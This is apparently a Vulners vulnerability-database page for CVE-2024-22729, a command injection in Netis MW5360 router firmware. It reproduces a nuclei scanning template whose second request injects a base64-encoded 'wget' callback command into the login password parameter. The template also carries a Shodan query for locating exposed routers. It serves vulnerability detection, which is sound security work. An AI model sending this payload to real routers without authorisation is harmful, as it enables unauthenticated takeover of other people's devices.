Lucene search
K

Netis MW5360 V1.0.1.3031 - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Netis MW5360 V1.0.1.3031 has a critical command injection vulnerability via password parameter.

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Netis MW5360 Remote Command Execution Exploit
24 Jun 202400:00
zdt
BDU FSTEC
The vulnerability of the web interface of the microprogrammed software for Netis MW5360 allows a hacker to execute arbitrary commands.
23 Jul 202400:00
bdu_fstec
Circl
CVE-2024-22729
25 Jan 202416:27
circl
CNNVD
NETIS SYSTEMS MW5360 Security Vulnerability
25 Jan 202400:00
cnnvd
CVE
CVE-2024-22729
25 Jan 202400:00
cve
Cvelist
CVE-2024-22729
25 Jan 202400:00
cvelist
Metasploit
Netis router MW5360 unauthenticated RCE.
24 Jun 202419:54
metasploit
NVD
CVE-2024-22729
25 Jan 202415:15
nvd
OSV
CVE-2024-22729
25 Jan 202415:15
osv
Packet Storm
Netis MW5360 Remote Command Execution
24 Jun 202400:00
packetstorm
Rows per page
id: CVE-2024-22729

info:
  name: Netis MW5360 V1.0.1.3031 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    NETIS SYSTEMS MW5360 V1.0.1.3031 was discovered to contain a command injection vulnerability via the password parameter on the login page.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands via the password parameter, potentially compromising the entire Netis router.
  remediation: |
    Update Netis MW5360 firmware to a version newer than V1.0.1.3031.
  reference:
    - https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-22729
    cwe-id: CWE-77
    epss-score: 0.70779
    epss-percentile: 0.99319
    cpe: cpe:2.3:o:netis-systems:mw5360_firmware:1.0.1.3031:*:*:*:*:*:*:*
  metadata:
    vendor: netis-systems
    product: mw5360_firmware
    shodan-query: title:"netis router"
  tags: cve,cve2024,rce,netis,unauth,vkev,vuln

variables:
  payload: "wget http://{{interactsh-url}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"netis router")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /cgi-bin/skk_set.cgi HTTP/1.1
        Host: {{Hostname}}
        Connection: close

        password={{base64("{{payload}}")}}&quick_set=ap&app=wan_set_shortcutz

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
# digest: 4a0a00473045022061a8f61d7aa588030d57311ae19537f7eee1d5d534b518812c240e7873e03cd9022100f793276b3b8618851278529e0fccf2de1474c9ff635988bd127ce3e69ec5b2a0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.70779
SSVC
11